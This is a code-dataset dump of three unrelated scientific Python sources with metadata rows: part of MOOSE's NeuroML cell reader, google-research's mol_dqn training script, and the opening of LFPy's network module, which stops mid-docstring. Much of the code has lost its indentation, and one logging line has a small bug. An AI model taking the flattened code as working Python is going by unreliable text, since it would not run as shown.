spec_capacitance = cell.find(".//{"+self.bio+"}spec_capacitance")
for parameter in spec_capacitance.findall(".//{"+self.bio+"}parameter"):
self.set_group_compartment_param(cell, cellname, parameter,\
'CM', float(parameter.attrib["value"])*CMfactor, self.bio)
spec_axial_resitance = cell.find(".//{"+self.bio+"}spec_axial_resistance")
for parameter in spec_axial_resitance.findall(".//{"+self.bio+"}parameter"):
self.set_group_compartment_param(cell, cellname, parameter,\
'RA', float(parameter.attrib["value"])*RAfactor, self.bio)
init_memb_potential = cell.find(".//{"+self.bio+"}init_memb_potential")
for parameter in init_memb_potential.findall(".//{"+self.bio+"}parameter"):
self.set_group_compartment_param(cell, cellname, parameter,\
'initVm', float(parameter.attrib["value"])*Efactor, self.bio)
chan_distrib = [] # the list for moose to parse inhomogeneous params (filled below)
for mechanism in cell.findall(".//{"+self.bio+"}mechanism"):
mechanismname = mechanism.attrib["name"]
passive = False
if "passive_conductance" in mechanism.attrib:
if mechanism.attrib['passive_conductance'] in ["true",'True','TRUE']:
passive = True
_logger.info("Loading mechanism %s " % mechanismname)
## ONLY creates channel if at least one parameter (like gmax) is specified in the xml
## Neuroml does not allow you to specify all default values.
## However, granule cell example in neuroconstruct has Ca ion pool without
## a parameter, applying default values to all compartments!
mech_params = mechanism.findall(".//{"+self.bio+"}parameter")
## if no params, apply all default values to all compartments
if len(mech_params) == 0:
for compartment_list in self.cellDictByCableId[cellname][1].values():
for compartment in compartment_list:
self.set_compartment_param(compartment,None,'default',mechanismname)
## if params are present, apply params to specified cable/compartment groups
for parameter in mech_params:
parametername = parameter.attrib['name']
if passive:
if parametername in ['gmax']:
self.set_group_compartment_param(cell, cellname, parameter,\
'RM', RMfactor*1.0/float(parameter.attrib["value"]), self.bio)
elif parametername in ['e','erev']:
self.set_group_compartment_param(cell, cellname, parameter,\
'Em', Efactor*float(parameter.attrib["value"]), self.bio)
elif parametername in ['inject']:
self.set_group_compartment_param(cell, cellname, parameter,\
'inject', Ifactor*float(parameter.attrib["value"]), self.bio)
else:
_logger.warning(["Yo programmer of MorphML! You didn't"
, " implement parameter %s " % parametername
, " in mechanism %s " % mechanismname
]
)
else:
if parametername in ['gmax']:
gmaxval = float(eval(parameter.attrib["value"],{"__builtins__":None},{}))
self.set_group_compartment_param(cell, cellname, parameter,\
'Gbar', Gfactor*gmaxval, self.bio, mechanismname)
elif parametername in ['e','erev']:
self.set_group_compartment_param(cell, cellname, parameter,\
'Ek', Efactor*float(parameter.attrib["value"]), self.bio, mechanismname)
elif parametername in ['depth']: # has to be type Ion Concentration!
self.set_group_compartment_param(cell, cellname, parameter,\
'thick', self.length_factor*float(parameter.attrib["value"]),\
self.bio, mechanismname)
elif parametername in ['v_reset']:
self.set_group_compartment_param(cell, cellname, parameter,\
'v_reset', Efactor*float(parameter.attrib["value"]),\
self.bio, mechanismname)
elif parametername in ['threshold']:
self.set_group_compartment_param(cell, cellname, parameter,\
'threshold', Efactor*float(parameter.attrib["value"]),\
self.bio, mechanismname)
elif parametername in ['t_refrac']:
self.set_group_compartment_param(cell, cellname, parameter,\
't_refrac', Tfactor*float(parameter.attrib["value"]),\
self.bio, mechanismname)
else:
_logger.warning(["Yo programmer of MorphML import! You didn't"
, " implement parameter %s " % parametername
, " in mechanism %s " % mechanismname ]
)
## variable parameters:
## varying with:
## p, g, L, len, dia
## p: path distance from soma, measured along dendrite, in metres.
## g: geometrical distance from soma, in metres.
## L: electrotonic distance (# of lambdas) from soma, along dend. No units.
## len: length of compartment, in metres.
## dia: for diameter of compartment, in metres.
var_params = mechanism.findall(".//{"+self.bio+"}variable_parameter")
if len(var_params) > 0:
## if variable params are present
## and use MOOSE to apply the variable formula
for parameter in var_params:
parametername = parameter.attrib['name']
cablegroupstr4moose = ""
## the neuroml spec says there should be a single group in a variable_parameter
## of course user can always have multiple variable_parameter tags,
## if user wants multiple groups conforming to neuroml specs.
group = parameter.find(".//{"+self.bio+"}group")
cablegroupname = group.text
if cablegroupname == 'all':
cablegroupstr4moose = "#"
else:
for cableid in self.cablegroupsDict[cablegroupname]:
for compartment in self.cellDictByCableId[cellname][1][cableid]:
cablegroupstr4moose += "#"+compartment.name+"#,"
if cablegroupstr4moose[-1] == ',':
cablegroupstr4moose = cablegroupstr4moose[:-1] # remove last comma
inhomo_value = parameter.find(".//{"+self.bio+"}inhomogeneous_value")
inhomo_value_name = inhomo_value.attrib['param_name']
inhomo_value_value = inhomo_value.attrib['value']
if parametername == 'gmax':
inhomo_eqn = '('+inhomo_value_value+')*'+str(Gfactor)
# careful about physiol vs SI units
else:
inhomo_eqn = inhomo_value_value
_logger.warning('Physiol. vs SI units translation not'
' implemented for parameter '+parametername+
'in channel '+mechanismname)+'. Use SI units'
'or ask for implementation.'
chan_distrib.extend((mechanismname,cablegroupstr4moose,parametername,inhomo_eqn,""))
# use extend, not append, moose wants it this way
## get mooose to parse the variable parameter gmax channel distributions
#pu.info("Some channel parameters distributed as per "+str(chan_distrib))
moosecell.channelDistribution = chan_distrib
#### Connect the Ca pools and channels
#### Am connecting these at the very end so that all channels and pools have been created
#### Note: this function is in moose.utils not moose.neuroml.utils !
for compartment_list in self.cellDictByCableId[cellname][1].values():
moose_utils.connect_CaConc(compartment_list,\
self.temperature+neuroml_utils.ZeroCKelvin) # temperature should be in Kelvin for Nernst
##########################################################
#### load connectivity / synapses into the compartments
connectivity = cell.find(".//{"+self.neuroml+"}connectivity")
if connectivity is not None:
for potential_syn_loc in cell.findall(".//{"+self.nml+"}potential_syn_loc"):
if 'synapse_direction' in potential_syn_loc.attrib:
if potential_syn_loc.attrib['synapse_direction'] in ['post','preAndOrPost']:
self.set_group_compartment_param(cell, cellname, potential_syn_loc,\
'synapse_type', potential_syn_loc.attrib['synapse_type'],\
self.nml, mechanismname='synapse')
if potential_syn_loc.attrib['synapse_direction'] in ['pre','preAndOrPost']:
self.set_group_compartment_param(cell, cellname, potential_syn_loc,\
'spikegen_type', potential_syn_loc.attrib['synapse_type'],\
self.nml, mechanismname='spikegen')
##########################################################
#### annotate each compartment with the cablegroups it belongs to
self.cableDict = {}
for cablegroupname in self.cablegroupsDict:
comp_list = []
for cableid in self.cablegroupsDict[cablegroupname]:
for compartment in self.cellDictByCableId[cellname][1][cableid]:
cableStringPath = compartment.path+'/cable_groups'
cableString = moose.Mstring(cableStringPath)
if cableString.value == '':
cableString.value += cablegroupname
else:
cableString.value += ',' + cablegroupname
comp_list.append(compartment.name)
self.cableDict[cablegroupname] = comp_list
_logger.info("Finished loading into library, cell: %s " % cellname)
return {cellname:(self.segDict,self.cableDict)}
def set_group_compartment_param(self, cell, cellname, parameter,
                                name, value, grouptype, mechanismname=None):
    """
    Apply `value` for parameter `name` to every compartment referenced
    by the <group> children of this parameter element.

    A group named 'all' targets every compartment of the cell; any other
    group name is looked up in self.cablegroupsDict and resolved to the
    compartments of its cable ids.  The per-compartment assignment is
    delegated to set_compartment_param().
    """
    group_tag = ".//{" + grouptype + "}group"
    for group in parameter.findall(group_tag):
        groupname = group.text
        if groupname == 'all':
            ## every compartment of every cable of this cell
            for comp_list in self.cellDictByCableId[cellname][1].values():
                for comp in comp_list:
                    self.set_compartment_param(comp, name, value, mechanismname)
        else:
            ## only the compartments belonging to this cable group
            for cable_id in self.cablegroupsDict[groupname]:
                for comp in self.cellDictByCableId[cellname][1][cable_id]:
                    self.set_compartment_param(comp, name, value, mechanismname)
def set_compartment_param(self, compartment, name, value, mechanismname):
"""Set one biophysical parameter on a single moose compartment.

Dispatches on `name` for passive/intfire parameters (CM, RM, RA, Em,
initVm, inject, v_reset, threshold, t_refrac, g_refrac), and on
`mechanismname` for synapse/spikegen potential locations and for
library-defined mechanisms (CaConc pools, HHChannel, HHChannel2D),
which are deep-copied from /library into the compartment when absent.

NOTE(review): specific CM/RM/RA/Gbar values are converted to absolute
Cm/Rm/Ra/Gbar using the compartment's cylindrical geometry, so
compartment.diameter and compartment.length must already be set.
"""
# Specific capacitance (per area) -> absolute Cm via lateral area pi*d*l.
if name == 'CM':
compartment.Cm = value*math.pi*compartment.diameter*compartment.length
# Specific membrane resistance (area*Ohm) -> absolute Rm (divide by area).
elif name == 'RM':
compartment.Rm = value/(math.pi*compartment.diameter*compartment.length)
# Specific axial resistance -> absolute Ra via length over cross-section.
elif name == 'RA':
compartment.Ra = value*compartment.length/(math.pi*(compartment.diameter/2.0)**2)
elif name == 'Em':
compartment.Em = value
elif name == 'initVm':
compartment.initVm = value
elif name == 'inject':
# this reader converts to SI
# NOTE(review): "Comparment" is a typo in the log message below.
_logger.info("Comparment %s inject %s A." % (compartment.name, value))
compartment.inject = value
elif name == 'v_reset':
compartment.vReset = value # compartment is a moose.LIF instance (intfire)
elif name == 'threshold':
compartment.thresh = value # compartment is a moose.LIF instance (intfire)
elif name == 't_refrac':
compartment.refractoryPeriod = value # compartment is a moose.LIF instance (intfire)
elif name == 'g_refrac':
_logger.info("SORRY, current moose.LIF doesn't support g_refrac.")
elif mechanismname == 'synapse': # synapse being added to the compartment
## these are potential locations, we do not actually make synapses,
## unless the user has explicitly asked for it
if self.createPotentialSynapses:
syn_name = value
if not moose.exists(compartment.path+'/'+syn_name):
make_new_synapse(syn_name, compartment, syn_name, self.nml_params)
## I assume below that compartment name has _segid at its end
segid = compartment.name.split('_')[-1] # get segment id from compartment name
# record the synapse type in the per-segment bookkeeping list (index 5)
self.segDict[segid][5].append(value)
elif mechanismname == 'spikegen': # spikegen being added to the compartment
## these are potential locations, we do not actually make the spikegens.
## spikegens for different synapses can have different thresholds,
## hence include synapse_type in its name
## value contains name of synapse i.e. synapse_type
#spikegen = moose.SpikeGen(compartment.path+'/'+value+'_spikegen')
#moose.connect(compartment,"VmSrc",spikegen,"Vm")
pass
## previous were mechanism that don't need a ChannelML definition
## including integrate_and_fire (I ignore the ChannelML definition)
## thus integrate_and_fire mechanism default values cannot be used
## i.e. nothing needed in /library, but below mechanisms need.
elif mechanismname is not None:
## if mechanism is not present in compartment, deep copy from library
## all mechanisms have been loaded into the library earlier
if not moose.exists(compartment.path+'/'+mechanismname):
neutralObj = moose.element("/library/"+mechanismname) # gives error if not present
if 'CaConc' == neutralObj.className: # Ion concentration pool
libcaconc = moose.CaConc("/library/"+mechanismname)
## deep copies the library caconc under the compartment
caconc = moose.copy(libcaconc,compartment,mechanismname)
caconc = moose.CaConc(caconc)
## CaConc connections are made later using connect_CaConc()
## Later, when calling connect_CaConc,
## B is set for caconc based on thickness of Ca shell and compartment l and dia
## OR based on the Mstring phi under CaConc path.
channel = None
elif 'HHChannel2D' == neutralObj.className : ## HHChannel2D
libchannel = moose.HHChannel2D("/library/"+mechanismname)
## deep copies the library channel under the compartment
channel = moose.copy(libchannel,compartment,mechanismname)
channel = moose.HHChannel2D(channel)
moose.connect(channel,'channel',compartment,'channel')
elif 'HHChannel' == neutralObj.className : ## HHChannel
libchannel = moose.HHChannel("/library/"+mechanismname)
## deep copies the library channel under the compartment
channel = moose.copy(libchannel,compartment,mechanismname)
channel = moose.HHChannel(channel)
moose.connect(channel,'channel',compartment,'channel')
## if mechanism is present in compartment, just wrap it
else:
neutralObj = moose.element(compartment.path+'/'+mechanismname)
if 'CaConc' == neutralObj.className: # Ion concentration pool
caconc = moose.CaConc(compartment.path+'/'+mechanismname) # wraps existing channel
channel = None
elif 'HHChannel2D' == neutralObj.className : ## HHChannel2D
channel = moose.HHChannel2D(compartment.path+'/'+mechanismname) # wraps existing channel
elif 'HHChannel' == neutralObj.className : ## HHChannel
channel = moose.HHChannel(compartment.path+'/'+mechanismname) # wraps existing channel
# NOTE(review): if neutralObj.className matches none of the branches
# above, `channel`/`caconc` remain unbound and the code below raises
# NameError -- presumably every library mechanism is one of the three
# handled classes; confirm.
if name == 'Gbar':
if channel is None: # if CaConc, neuroConstruct uses gbar for thickness or phi
## If child Mstring 'phi' is present, set gbar as phi
## BUT, value has been multiplied by Gfactor as a Gbar,
## SI or physiological not known here,
## ignoring Gbar for CaConc, instead of passing units here
child = moose_utils.get_child_Mstring(caconc,'phi')
if child is not None:
#child.value = value
pass
else:
#caconc.thick = value
pass
else: # if ion channel, usual Gbar
# conductance density -> absolute conductance via lateral area pi*d*l
channel.Gbar = value*math.pi*compartment.diameter*compartment.length
elif name == 'Ek':
channel.Ek = value
elif name == 'thick': # thick seems to be NEURON's extension to NeuroML level 2.
caconc.thick = value ## JUST THIS WILL NOT DO - HAVE TO SET B based on this thick!
## Later, when calling connect_CaConc,
## B is set for caconc based on thickness of Ca shell and compartment l and dia.
## OR based on the Mstring phi under CaConc path.
if neuroml_utils.neuroml_debug:
_logger.info("Setting %s for comparment %s to %s" % (name, compartment.path, value))
| upibhalla/moose-core | python/moose/neuroml/MorphML.py | Python | gpl-3.0 | 40,773 | [
"MOOSE",
"NEURON"
] | 11fa136505fe0c251b2c49924a7383cf067e3769e39aa184adf0be21a7dec604 |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Executor for deep Q network models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import json
import os
import time
from absl import app
from absl import flags
from absl import logging
from baselines.common import schedules
from baselines.deepq import replay_buffer
import numpy as np
from rdkit import Chem
from rdkit import DataStructs
from rdkit.Chem import AllChem
from rdkit.Chem import Descriptors
from rdkit.Chem import QED
from six.moves import range
import tensorflow.compat.v1 as tf
from tensorflow.compat.v1 import gfile
from mol_dqn.chemgraph.dqn import deep_q_networks
from mol_dqn.chemgraph.dqn import molecules as molecules_mdp
from mol_dqn.chemgraph.dqn.py import molecules
from mol_dqn.chemgraph.dqn.tensorflow_core import core
# Command-line flags: output location, optimization target(s), and an
# optional JSON file of DQN hyperparameter overrides.
flags.DEFINE_string('model_dir',
'/namespace/gas/primary/zzp/dqn/r=3/exp2_bs_dqn',
'The directory to save data to.')
flags.DEFINE_string('target_molecule', 'C1CCC2CCCCC2C1',
'The SMILES string of the target molecule.')
flags.DEFINE_string('start_molecule', None,
'The SMILES string of the start molecule.')
# Trades off similarity vs QED in the multi-objective reward (see run_dqn).
flags.DEFINE_float(
'similarity_weight', 0.5,
'The weight of the similarity score in the reward function.')
flags.DEFINE_float('target_weight', 493.60,
'The target molecular weight of the molecule.')
flags.DEFINE_string('hparams', None, 'Filename for serialized HParams.')
flags.DEFINE_boolean('multi_objective', False,
'Whether to run multi objective DQN.')
FLAGS = flags.FLAGS
class TargetWeightMolecule(molecules_mdp.Molecule):
  """Molecule MDP whose reward favors a target molecular weight.

  The reward is 1 inside a +/- 25 Dalton window around the target weight
  and is the negative distance to that window outside of it.  States
  that do not parse as molecules receive a large negative penalty.
  """

  def __init__(self, target_weight, **kwargs):
    """Initializes the class.

    Args:
      target_weight: Float. The target molecular weight.
      **kwargs: Keyword arguments forwarded to molecules_mdp.Molecule.
    """
    super(TargetWeightMolecule, self).__init__(**kwargs)
    self.target_weight = target_weight

  def _reward(self):
    """Calculates the reward of the current state.

    Returns:
      Float. 1 if the molecular weight lies within 25 of the target,
      otherwise the negative distance to the nearest window edge;
      invalid molecules get -target_weight**2.
    """
    mol = Chem.MolFromSmiles(self._state)
    if mol is None:
      # Heavy penalty for states that do not parse as molecules.
      return -self.target_weight**2
    weight = Descriptors.MolWt(mol)
    lower_bound = self.target_weight - 25
    upper_bound = self.target_weight + 25
    if lower_bound <= weight <= upper_bound:
      return 1
    # Negative distance to the nearest edge of the target window.
    return -min(abs(lower_bound - weight), abs(upper_bound - weight))
class MultiObjectiveRewardMolecule(molecules_mdp.Molecule):
  """Molecule MDP with a two-dimensional reward.

  The reward vector holds two entries:
    reward = (similarity_score, qed_score)
  where similarity is the Tanimoto similarity to a fixed target molecule
  and QED is the quantitative estimate of drug-likeness.
  """

  def __init__(self, target_molecule, **kwargs):
    """Initializes the class.

    Args:
      target_molecule: SMILES string. The molecule against which the
        similarity entry of the reward is computed.
      **kwargs: Keyword arguments forwarded to molecules_mdp.Molecule.
    """
    super(MultiObjectiveRewardMolecule, self).__init__(**kwargs)
    target = Chem.MolFromSmiles(target_molecule)
    self._target_mol_fingerprint = self.get_fingerprint(target)
    self._target_mol_scaffold = molecules.get_scaffold(target)
    # Two reward entries: (similarity, QED).
    self.reward_dim = 2

  def get_fingerprint(self, molecule):
    """Returns the Morgan fingerprint (radius 2) of a molecule.

    Args:
      molecule: Chem.Mol. The molecule to fingerprint.

    Returns:
      rdkit.ExplicitBitVect. The fingerprint.
    """
    return AllChem.GetMorganFingerprint(molecule, radius=2)

  def get_similarity(self, smiles):
    """Returns the Tanimoto similarity between `smiles` and the target.

    Args:
      smiles: String. SMILES of the molecule to compare.

    Returns:
      Float. Tanimoto similarity; 0.0 when the SMILES does not parse.
    """
    mol = Chem.MolFromSmiles(smiles)
    if mol is None:
      return 0.0
    return DataStructs.TanimotoSimilarity(self._target_mol_fingerprint,
                                          self.get_fingerprint(mol))

  def _reward(self):
    """Calculates the reward of the current state.

    Returns:
      Tuple (similarity, qed). Similarity is 0.0 unless the current
      molecule contains the target's scaffold; both entries are 0.0
      when the state is missing or not a valid molecule.
    """
    if self._state is None:
      return 0.0, 0.0
    mol = Chem.MolFromSmiles(self._state)
    if mol is None:
      return 0.0, 0.0
    # Similarity only counts when the target scaffold is present.
    if molecules.contains_scaffold(mol, self._target_mol_scaffold):
      similarity = self.get_similarity(self._state)
    else:
      similarity = 0.0
    return similarity, QED.qed(mol)
# TODO(zzp): use the tf.estimator interface.
def run_training(hparams, environment, dqn):
"""Runs the training procedure.
Briefly, the agent runs the action network to get an action to take in
the environment. The state transition and reward are stored in the memory.
Periodically the agent samples a batch of samples from the memory to
update(train) its Q network. Note that the Q network and the action network
share the same set of parameters, so the action network is also updated by
the samples of (state, action, next_state, reward) batches.
Args:
hparams: tf.contrib.training.HParams. The hyper parameters of the model.
environment: molecules.Molecule. The environment to run on.
dqn: An instance of the DeepQNetwork class.
Returns:
None
"""
summary_writer = tf.summary.FileWriter(FLAGS.model_dir)
tf.reset_default_graph()
with tf.Session() as sess:
dqn.build()
model_saver = tf.train.Saver(max_to_keep=hparams.max_num_checkpoints)
# The schedule for the epsilon in epsilon greedy policy.
# Epsilon decays piecewise-linearly 1.0 -> 0.1 -> 0.01 over the episodes.
exploration = schedules.PiecewiseSchedule(
[(0, 1.0), (int(hparams.num_episodes / 2), 0.1),
(hparams.num_episodes, 0.01)],
outside_value=0.01)
# Importance-sampling exponent beta anneals linearly from
# prioritized_beta to 0 over the course of training.
if hparams.prioritized:
memory = replay_buffer.PrioritizedReplayBuffer(hparams.replay_buffer_size,
hparams.prioritized_alpha)
beta_schedule = schedules.LinearSchedule(
hparams.num_episodes, initial_p=hparams.prioritized_beta, final_p=0)
else:
memory = replay_buffer.ReplayBuffer(hparams.replay_buffer_size)
beta_schedule = None
sess.run(tf.global_variables_initializer())
# NOTE(review): update_op presumably syncs the target Q-network with
# the online network -- confirm in deep_q_networks.
sess.run(dqn.update_op)
global_step = 0
for episode in range(hparams.num_episodes):
global_step = _episode(
environment=environment,
dqn=dqn,
memory=memory,
episode=episode,
global_step=global_step,
hparams=hparams,
summary_writer=summary_writer,
exploration=exploration,
beta_schedule=beta_schedule)
# Re-run update_op every update_frequency episodes.
if (episode + 1) % hparams.update_frequency == 0:
sess.run(dqn.update_op)
# Checkpoint every save_frequency episodes.
if (episode + 1) % hparams.save_frequency == 0:
model_saver.save(
sess,
os.path.join(FLAGS.model_dir, 'ckpt'),
global_step=global_step)
def _episode(environment, dqn, memory, episode, global_step, hparams,
summary_writer, exploration, beta_schedule):
"""Runs a single episode.
Args:
environment: molecules.Molecule; the environment to run on.
dqn: DeepQNetwork used for estimating rewards.
memory: ReplayBuffer used to store observations and rewards.
episode: Integer episode number.
global_step: Integer global step; the total number of steps across all
episodes.
hparams: HParams.
summary_writer: FileWriter used for writing Summary protos.
exploration: Schedule used for exploration in the environment.
beta_schedule: Schedule used for prioritized replay buffers.
Returns:
Updated global_step.
"""
episode_start_time = time.time()
environment.initialize()
# With bootstrapped DQN, pick one head at random and use it for the
# whole episode; otherwise always use head 0.
if hparams.num_bootstrap_heads:
head = np.random.randint(hparams.num_bootstrap_heads)
else:
head = 0
for step in range(hparams.max_steps_per_episode):
result = _step(
environment=environment,
dqn=dqn,
memory=memory,
episode=episode,
hparams=hparams,
exploration=exploration,
head=head)
# Log the final state/reward of the episode only on the last step.
if step == hparams.max_steps_per_episode - 1:
episode_summary = dqn.log_result(result.state, result.reward)
summary_writer.add_summary(episode_summary, global_step)
logging.info('Episode %d/%d took %gs', episode + 1, hparams.num_episodes,
time.time() - episode_start_time)
logging.info('SMILES: %s\n', result.state)
# Use %s since reward can be a tuple or a float number.
logging.info('The reward is: %s', str(result.reward))
# Train only after a warm-up of min(50, num_episodes/10) episodes,
# and then only every learning_frequency global steps.
if (episode > min(50, hparams.num_episodes / 10)) and (
global_step % hparams.learning_frequency == 0):
if hparams.prioritized:
(state_t, _, reward_t, state_tp1, done_mask, weight,
indices) = memory.sample(
hparams.batch_size, beta=beta_schedule.value(episode))
else:
(state_t, _, reward_t, state_tp1,
done_mask) = memory.sample(hparams.batch_size)
# Uniform replay: all importance weights are 1.
weight = np.ones([reward_t.shape[0]])
# np.atleast_2d cannot be used here because a new dimension will
# be always added in the front and there is no way of changing this.
if reward_t.ndim == 1:
reward_t = np.expand_dims(reward_t, axis=1)
td_error, error_summary, _ = dqn.train(
states=state_t,
rewards=reward_t,
next_states=state_tp1,
done=np.expand_dims(done_mask, axis=1),
weight=np.expand_dims(weight, axis=1))
summary_writer.add_summary(error_summary, global_step)
logging.info('Current TD error: %.4f', np.mean(np.abs(td_error)))
# New priorities are |TD error| + epsilon, keeping every sample's
# probability of being drawn strictly positive.
if hparams.prioritized:
memory.update_priorities(
indices,
np.abs(np.squeeze(td_error) + hparams.prioritized_epsilon).tolist())
global_step += 1
return global_step
def _step(environment, dqn, memory, episode, hparams, exploration, head):
  """Runs a single step within an episode.

  Args:
    environment: molecules.Molecule; the environment to run on.
    dqn: DeepQNetwork used for estimating rewards.
    memory: ReplayBuffer used to store observations and rewards.
    episode: Integer episode number.
    hparams: HParams.
    exploration: Schedule used for exploration in the environment.
    head: Integer index of the DeepQNetwork head to use.

  Returns:
    molecules.Result object containing the result of the step.
  """
  # Encode every currently-valid action as (fingerprint, steps_left).
  steps_left = hparams.max_steps_per_episode - environment.num_steps_taken
  valid_actions = list(environment.get_valid_actions())
  observations = np.vstack([
      np.append(deep_q_networks.get_fingerprint(act, hparams), steps_left)
      for act in valid_actions
  ])
  # Let the DQN pick an action (epsilon-greedy, epsilon from the schedule).
  chosen_index = dqn.get_action(
      observations, head=head, update_epsilon=exploration.value(episode))
  action = valid_actions[chosen_index]
  action_t_fingerprint = np.append(
      deep_q_networks.get_fingerprint(action, hparams), steps_left)
  result = environment.step(action)
  # Encode the actions that are valid from the *next* state.
  steps_left = hparams.max_steps_per_episode - environment.num_steps_taken
  action_fingerprints = np.vstack([
      np.append(deep_q_networks.get_fingerprint(act, hparams), steps_left)
      for act in environment.get_valid_actions()
  ])
  # obs_t stores the fingerprint of the chosen action, so the stored
  # `action` index carries no information here.
  memory.add(
      obs_t=action_t_fingerprint,
      action=0,
      reward=result.reward,
      obs_tp1=action_fingerprints,
      done=float(result.terminated))
  return result
def run_dqn(multi_objective=False):
"""Run the training of Deep Q Network algorithm.
Args:
multi_objective: Boolean. Whether to run the multiobjective DQN.
"""
# Load hyperparameters from the JSON file given by --hparams, if any,
# otherwise fall back to the defaults from deep_q_networks.
if FLAGS.hparams is not None:
with gfile.Open(FLAGS.hparams, 'r') as f:
hparams = deep_q_networks.get_hparams(**json.load(f))
else:
hparams = deep_q_networks.get_hparams()
logging.info(
'HParams:\n%s', '\n'.join([
'\t%s: %s' % (key, value)
for key, value in sorted(hparams.values().items())
]))
# TODO(zzp): merge single objective DQN to multi objective DQN.
if multi_objective:
# NOTE(review): this branch hard-codes allow_bonds_between_rings=False
# and allowed_ring_sizes={3, 4, 5, 6} instead of reading them from
# hparams as the single-objective branch does -- confirm intentional.
environment = MultiObjectiveRewardMolecule(
target_molecule=FLAGS.target_molecule,
atom_types=set(hparams.atom_types),
init_mol=FLAGS.start_molecule,
allow_removal=hparams.allow_removal,
allow_no_modification=hparams.allow_no_modification,
allow_bonds_between_rings=False,
allowed_ring_sizes={3, 4, 5, 6},
max_steps=hparams.max_steps_per_episode)
# Column vector [similarity_weight; 1 - similarity_weight] weighting
# the two reward entries (similarity, QED).
dqn = deep_q_networks.MultiObjectiveDeepQNetwork(
objective_weight=np.array([[FLAGS.similarity_weight],
[1 - FLAGS.similarity_weight]]),
input_shape=(hparams.batch_size, hparams.fingerprint_length + 1),
q_fn=functools.partial(
deep_q_networks.multi_layer_model, hparams=hparams),
optimizer=hparams.optimizer,
grad_clipping=hparams.grad_clipping,
num_bootstrap_heads=hparams.num_bootstrap_heads,
gamma=hparams.gamma,
epsilon=1.0)
else:
environment = TargetWeightMolecule(
target_weight=FLAGS.target_weight,
atom_types=set(hparams.atom_types),
init_mol=FLAGS.start_molecule,
allow_removal=hparams.allow_removal,
allow_no_modification=hparams.allow_no_modification,
allow_bonds_between_rings=hparams.allow_bonds_between_rings,
allowed_ring_sizes=set(hparams.allowed_ring_sizes),
max_steps=hparams.max_steps_per_episode)
dqn = deep_q_networks.DeepQNetwork(
input_shape=(hparams.batch_size, hparams.fingerprint_length + 1),
q_fn=functools.partial(
deep_q_networks.multi_layer_model, hparams=hparams),
optimizer=hparams.optimizer,
grad_clipping=hparams.grad_clipping,
num_bootstrap_heads=hparams.num_bootstrap_heads,
gamma=hparams.gamma,
epsilon=1.0)
run_training(
hparams=hparams,
environment=environment,
dqn=dqn,
)
# Persist the hyperparameters used for this run next to the checkpoints.
core.write_hparams(hparams, os.path.join(FLAGS.model_dir, 'config.json'))
def main(argv):
  """absl.app entry point: dispatch to the DQN training routine.

  Command-line configuration is carried entirely by FLAGS; the positional
  argument vector supplied by absl is not used.
  """
  del argv  # unused.
  run_dqn(FLAGS.multi_objective)
# Parse command-line flags and hand control to main() when run as a script.
if __name__ == '__main__':
  app.run(main)
| google-research/google-research | mol_dqn/chemgraph/dqn/run_dqn.py | Python | apache-2.0 | 15,386 | [
"RDKit"
] | e96467655a139cfeb2f320fe14095f7e40d48673a46bd402141d19bd9fa45c23 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Defines classes and methods used for recurrent neuronal networks.
Copyright (C) 2012 Computational Neuroscience Group, NMBU.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
"""
import numpy as np
import os
import scipy.stats as stats
import h5py
from mpi4py import MPI
import neuron
from neuron import units
from .templatecell import TemplateCell
import scipy.sparse as ss
from warnings import warn
# set up MPI environment: global communicator plus the size of the job and
# this process' rank, used below for round-robin distribution of cells
COMM = MPI.COMM_WORLD
SIZE = COMM.Get_size()  # total number of MPI processes
RANK = COMM.Get_rank()  # 0-based identity of this process within COMM
def flattenlist(lst):
    """Concatenate the elements of ``lst``'s sub-iterables into a flat list.

    E.g. ``flattenlist([[1, 2], [3]])`` returns ``[1, 2, 3]``.
    """
    flat = []
    for sub in lst:
        flat.extend(sub)
    return flat
##########################################################################
# NetworkCell class that has a create_synapse method that
# creates a synapse on the target cell, and a create_spike_detector method that
# allows for connecting to a synapse on a target cell. All other methods and
# attributes are inherited from the standard LFPy.TemplateCell class
##########################################################################
class NetworkCell(TemplateCell):
    """
    Similar to `LFPy.TemplateCell` with the addition of some attributes and
    methods allowing for spike communication between parallel RANKs.
    This class allow using NEURON templates with some limitations.
    This takes all the same parameters as the Cell class, but requires three
    more template related parameters
    Parameters
    ----------
    morphology: str
        path to morphology file
    templatefile: str
        File with cell template definition(s)
    templatename: str
        Cell template-name used for this cell object
    templateargs: str
        Parameters provided to template-definition
    v_init: float
        Initial membrane potential. Default to -65.
    Ra: float
        axial resistance. Defaults to 150.
    cm: float
        membrane capacitance. Defaults to 1.0
    passive: bool
        Passive mechanisms are initialized if True. Defaults to True
    passive_parameters: dict
        parameter dictionary with values for the passive membrane mechanism in
        NEURON ('pas'). The dictionary must contain keys 'g_pas' and 'e_pas',
        like the default: passive_parameters=dict(g_pas=0.001, e_pas=-70)
    extracellular: bool
        switch for NEURON's extracellular mechanism. Defaults to False
    dt: float
        Simulation time step. Defaults to 2**-4
    tstart: float
        initialization time for simulation <= 0 ms. Defaults to 0.
    tstop: float
        stop time for simulation > 0 ms. Defaults to 100.
    nsegs_method: 'lambda100' or 'lambda_f' or 'fixed_length' or None
        nseg rule, used by NEURON to determine number of compartments.
        Defaults to 'lambda100'
    max_nsegs_length: float or None
        max segment length for method 'fixed_length'. Defaults to None
    lambda_f: int
        AC frequency for method 'lambda_f'. Defaults to 100
    d_lambda: float
        parameter for d_lambda rule. Defaults to 0.1
    delete_sections: bool
        delete pre-existing section-references. Defaults to True
    custom_code: list or None
        list of model-specific code files ([.py/.hoc]). Defaults to None
    custom_fun: list or None
        list of model-specific functions with args. Defaults to None
    custom_fun_args: list or None
        list of args passed to custom_fun functions. Defaults to None
    pt3d: bool
